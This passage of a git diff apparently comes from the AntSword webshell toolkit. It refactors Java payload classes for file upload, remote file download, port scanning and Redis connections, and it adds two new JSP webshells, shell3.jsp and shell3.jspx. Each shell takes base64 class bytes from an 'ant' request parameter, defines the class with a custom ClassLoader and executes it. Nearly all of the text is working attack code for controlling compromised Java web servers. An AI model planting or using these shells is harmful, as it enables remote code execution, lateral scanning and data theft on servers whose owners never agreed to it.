int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/filemanager/Upload_file.java b/src/filemanager/Upload_file.java index 51387c2..6145c50 100644 --- a/src/filemanager/Upload_file.java +++ b/src/filemanager/Upload_file.java @@ -9,40 +9,15 @@ public class Upload_file { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; @@ -94,10 +69,42 @@ String UploadFileCode(String savefilePath, String fileHexContext) throws Excepti return "1"; } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/filemanager/Wget.java b/src/filemanager/Wget.java index 3f130d1..6d39a0a 100644 --- a/src/filemanager/Wget.java +++ b/src/filemanager/Wget.java @@ -11,40 +11,15 @@ public class Wget { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargurl"; @@ -99,10 +74,42 @@ String WgetCode(String urlPath, String saveFilePath) throws Exception { return "1"; } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/other/PortScan.java b/src/other/PortScan.java index 27cdb9c..ef24950 100644 --- a/src/other/PortScan.java +++ b/src/other/PortScan.java @@ -9,40 +9,15 @@ public class PortScan { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargip"; @@ -82,7 +57,7 @@ String decode(String str) throws Exception { } String Scan(String ip, String ports) throws Exception { - StringBuffer sb = new StringBuffer(""); + StringBuffer sb = new StringBuffer(); String[] portlist = ports.split(","); Socket socket = null; for (int i = 0; i < portlist.length; i++) { @@ -125,10 +100,42 @@ Socket createSocket(String addr) throws Exception { } } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/src/other/RedisConn.java b/src/other/RedisConn.java index a3a37de..59d895c 100644 --- a/src/other/RedisConn.java +++ b/src/other/RedisConn.java @@ -14,40 +14,15 @@ public class RedisConn { public HttpServletRequest request = null; public HttpServletResponse response = null; - public String encoder; - public String cs; - public String randomPrefix; + public String encoder = "base64"; + public String cs = "antswordCharset"; + public String randomPrefix = "antswordrandomPrefix"; public String decoderClassdata; @Override public boolean equals(Object obj) { - try { - Class clazz = Class.forName("javax.servlet.jsp.PageContext"); - request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); - response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception e) { - if (obj instanceof HttpServletRequest) { - request = (HttpServletRequest) obj; - try { - Field req = request.getClass().getDeclaredField("request"); - req.setAccessible(true); - HttpServletRequest request2 = (HttpServletRequest) req.get(request); - Field resp = request2.getClass().getDeclaredField("response"); - resp.setAccessible(true); - response = (HttpServletResponse) resp.get(request2); - } catch (Exception ex) { - try { - response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); - } catch (Exception ignored) { - - } - } - } - } - randomPrefix = "antswordrandomPrefix"; - encoder = "base64"; - cs = "antswordCharset"; - StringBuffer output = new StringBuffer(""); + this.parseObj(obj); + StringBuffer output = new StringBuffer(); String tag_s = "->|"; String tag_e = "|<-"; String varkey1 = "antswordargaddr"; @@ -92,7 +67,7 @@ String Base64Encode(String str) { String ret = ""; if (version.compareTo("1.9") >= 0) { Class Base64 = Class.forName("java.util.Base64"); - Object Encoder = Base64.getMethod("getEncoder", new Class[0]).invoke(Base64, new Object[]{}); + Object Encoder = Base64.getMethod("getEncoder", new Class[0]).invoke(Base64); ret = (String) Encoder.getClass().getMethod("encodeToString", byte[].class).invoke(Encoder, str.getBytes()); } else { Class Base64 = Class.forName("sun.misc.BASE64Encoder"); @@ -166,10 +141,42 @@ Socket createSocket(String addr) throws Exception { } } + public void parseObj(Object obj) { + if (obj.getClass().isArray()) { + Object[] data = (Object[]) obj; + request = (HttpServletRequest) data[0]; + response = (HttpServletResponse) data[1]; + } else { + try { + Class clazz = Class.forName("javax.servlet.jsp.PageContext"); + request = (HttpServletRequest) clazz.getDeclaredMethod("getRequest").invoke(obj); + response = (HttpServletResponse) clazz.getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception e) { + if (obj instanceof HttpServletRequest) { + request = (HttpServletRequest) obj; + try { + Field req = request.getClass().getDeclaredField("request"); + req.setAccessible(true); + HttpServletRequest request2 = (HttpServletRequest) req.get(request); + Field resp = request2.getClass().getDeclaredField("response"); + resp.setAccessible(true); + response = (HttpServletResponse) resp.get(request2); + } catch (Exception ex) { + try { + response = (HttpServletResponse) request.getClass().getDeclaredMethod("getResponse").invoke(obj); + } catch (Exception ignored) { + + } + } + } + } + } + } + public String asoutput(String str) { try { byte[] classBytes = Base64DecodeToByte(decoderClassdata); - java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", new Class[]{byte[].class, int.class, int.class}); + java.lang.reflect.Method defineClassMethod = ClassLoader.class.getDeclaredMethod("defineClass", byte[].class, int.class, int.class); defineClassMethod.setAccessible(true); Class cc = (Class) defineClassMethod.invoke(this.getClass().getClassLoader(), classBytes, 0, classBytes.length); return cc.getConstructor(String.class).newInstance(str).toString(); diff --git a/web/base/Info.jsp b/web/base/Info.jsp index 224ba35..fd9422b 100644 --- a/web/base/Info.jsp +++ b/web/base/Info.jsp @@ -1,4 +1,6 @@ <%@ page import="base.Info" %><% Info info = new Info(); - info.equals(request); + info.cs="UTF-8"; +// info.equals(request); + info.equals(new Object[]{request,response}); %> \ No newline at end of file diff --git a/web/filemanager/Dir.jsp b/web/filemanager/Dir.jsp index c18b8f1..8b89431 100644 --- a/web/filemanager/Dir.jsp +++ b/web/filemanager/Dir.jsp @@ -1,4 +1,6 @@ <%@ page import="filemanager.Dir" %><% Dir dir = new Dir(); - dir.equals(request); + dir.cs="UTF-8"; + dir.randomPrefix="0"; + dir.equals(new Object[]{request,response}); %> \ No newline at end of file diff --git a/web/shell3.jsp b/web/shell3.jsp new file mode 100644 index 0000000..71eb3c7 --- /dev/null +++ b/web/shell3.jsp @@ -0,0 +1,27 @@ +<%! + class U extends ClassLoader { + U(ClassLoader c) { + super(c); + } + public Class g(byte[] b) { + return super.defineClass(b, 0, b.length); + } + } + + public byte[] base64Decode(String str) throws Exception { + try { + Class clazz = Class.forName("sun.misc.BASE64Decoder"); + return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str); + } catch (Exception e) { + Class clazz = Class.forName("java.util.Base64"); + Object decoder = clazz.getMethod("getDecoder").invoke(null); + return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); + } + } +%> +<% + String cls = request.getParameter("ant"); + if (cls != null) { + new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response}); + } +%> \ No newline at end of file diff --git a/web/shell3.jspx b/web/shell3.jspx new file mode 100644 index 0000000..7721877 --- /dev/null +++ b/web/shell3.jspx @@ -0,0 +1,28 @@ + + + class U extends ClassLoader { + U(ClassLoader c) { + super(c); + } + public Class g(byte[] b) { + return super.defineClass(b, 0, b.length); + } + } + public byte[] base64Decode(String str) throws Exception { + try { + Class clazz = Class.forName("sun.misc.BASE64Decoder"); + return (byte[]) clazz.getMethod("decodeBuffer", String.class).invoke(clazz.newInstance(), str); + } catch (Exception e) { + Class clazz = Class.forName("java.util.Base64"); + Object decoder = clazz.getMethod("getDecoder").invoke(null); + return (byte[]) decoder.getClass().getMethod("decode", String.class).invoke(decoder, str); + } + } + + + String cls = request.getParameter("ant"); + if (cls != null) { + new U(this.getClass().getClassLoader()).g(base64Decode(cls)).newInstance().equals(new Object[]{request,response}); + } + + \ No newline at end of file